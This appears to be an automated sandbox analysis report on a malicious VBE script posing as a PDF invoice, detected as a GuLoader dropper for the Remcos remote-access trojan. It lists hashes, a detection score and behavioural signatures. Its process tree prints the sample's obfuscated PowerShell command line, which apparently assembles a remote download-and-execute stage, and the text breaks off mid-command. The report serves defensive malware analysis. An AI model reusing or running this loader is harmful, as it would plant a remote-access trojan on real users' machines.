Analysis Report
Faktura_82666410_1361590461#U00b7pdf.vbe
Overview
General Information
Sample name: | Faktura_82666410_1361590461#U00b7pdf.vbe (renamed because original name is a hash value) |
Original sample name: | Faktura_82666410_1361590461pdf.vbe |
Analysis ID: | 1522517 |
MD5: | f1a0355012d13febdfb56ee8d2b38012 |
SHA1: | 38fb764e45b496b63b7a49713fac2b411cfc524b |
SHA256: | 670cb64bd0bbb0baf70d835715afa71ab16e20b3b409e66a2fd5fedfdb375f2b |
Tags: | vbe, user-abuse_ch |
Infos: | |
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6472 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Faktura_82666410_1361590461#U00b7pdf.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 3020 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#ubekend t Ninety D rmaatters #>;$Autora diogramme= 'Stivninge rnes84';<# Prolonging Fibromets Verbigera tive #>;$o mphacite=$ host.Priva teData;If ($omphacit e) {$Okole hao++;}fun ction Kolo nnetyperne s($aldis){ $aneurin=$ Drawbeam+$ aldis.Leng th-$Okoleh ao;for( $N onnormalne ss=5;$Nonn ormalness -lt $aneur in;$Nonnor malness+=6 ){$Befolkn ingsgruppe rnes+=$ald is[$Nonnor malness];} $Befolknin gsgruppern es;}functi on Sibs($V enezuelane ren){ & ($ Dkstolens7 0) ($Venez uelaneren) ;}$dyingne ss=Kolonne typernes ' Prom MBeng toTs bazMe jeniPowwol Unc.al ett aaDurst/s, ide5Beskr. Trian0Sejr s Go f(Ant epWOplseiD ueurnProgr dUge aoDor sow BekrsR e ta Opera N UngdT pe st Incit1M ic e0Elect .F den0Ind vi;Semin M odstWVid i iF rfrn os te6L ftt4 Hy,d;Prana Photx Ter m6Udski4Ru id;Han s Ve jurCry, ev Kryd:b. vge1.mbry2 sekst1,ara d.,enry0Ha lmk)Breve PoelsGBe,r aeStoddc K o skRemedo Azte/Pant o2Kroku0Be .be1 orle0 Overg0foll .1Fjert0Ub rug1 Unba grsenF ace ti Overr o naeAlgerfS ub,noSlagk xAban /Ind ia1Nglep2P reob1Fulge .,etai0Sta ff ';$Orig inalfabrik ken=Kolonn etypernes 'Ful ku ng ueSboligeT hickrSyna -SakraaSt, aagParage rapnIndskT No,pa ';$A phagia=Kol onnetypern es 'kara,h Tvelytvari ct IdeapVa usys Gui : Lunch/Gran s/Kitchd , agnr Perii G ngbvStop heFluor.A ecdgTariro Slu oOxal ig Formlty phle Ho t. 
DanscOrga no elvbmHi pli/Ev ntu Humanc unb l?KondeeKn trexMargup interoGenr erLinjetJu dge=Dividd ObtruoProt wFj rdnNe dsal Truso SpildaPal idJogge&F erniStrafd Prees=s.wb w1Tenni2 T ,lblCoa,jz FogedUTi,s yxExiteLL itnYAregey Stj rsS ut anNightAA rikH Outsg Plade1 stv l2 katunit r ORu.otMS pineX owsn bTotal7Bug huut ngsES ang y Misg O .amdaK e diJTotalCT angaA Ovnt NUnhorHPen geHAlkal ' ;$melaena= Kolonnetyp ernes ' ra l> .epo ' ;$Dkstolen s70=Kolonn etypernes 'MarguI Sh ineUndelXA toni ';$Pa ddehat='Cu lturises'; $Helbredsu ndersoegel se='\Kanal separation en.Gte';Si bs (Kolonn etypernes ' pee$ Aga mg LagrlH. drooR ccyb LgenpaSper mlAquaf:St atiT elevo TubatrHybr is tieriYd .rlo Brenn AktivsLydr easan efUn obsf Drjej .ombaeRect d skolrtr ffei Ti.gn .angegSml re Guddn,r ssa= Band$ S.reeA,pa rnMicasvBi f.n:Baunga Shi,lpH pl opSongld T ricaSlagbt eanaAstro +Carpi$Mel l,HSo taeS qui l Fors bKla rr yl evePraecdJ akiesDjvle uSennenFic indProtoeI nsa rPrim, sS ldeoDeg reeWleccg UdpieAi,bi lind ssLit tleSnobs ' );Sibs (Ko lonnetyper nes 'Beska $Subspg Eg oil rochoE k,tebAssor a .ortlPin t :A droKg idserRe ev aSymphmTel efmMic.oe PyronVaret dL bane Fl de=H nga$J ell ADemur pLogichT e era InergS ttteiSpiri aPolys..nt agsheedhpA rvealTr bo iHjesttBe nd(Addit$M uthmomkla eFintelAgi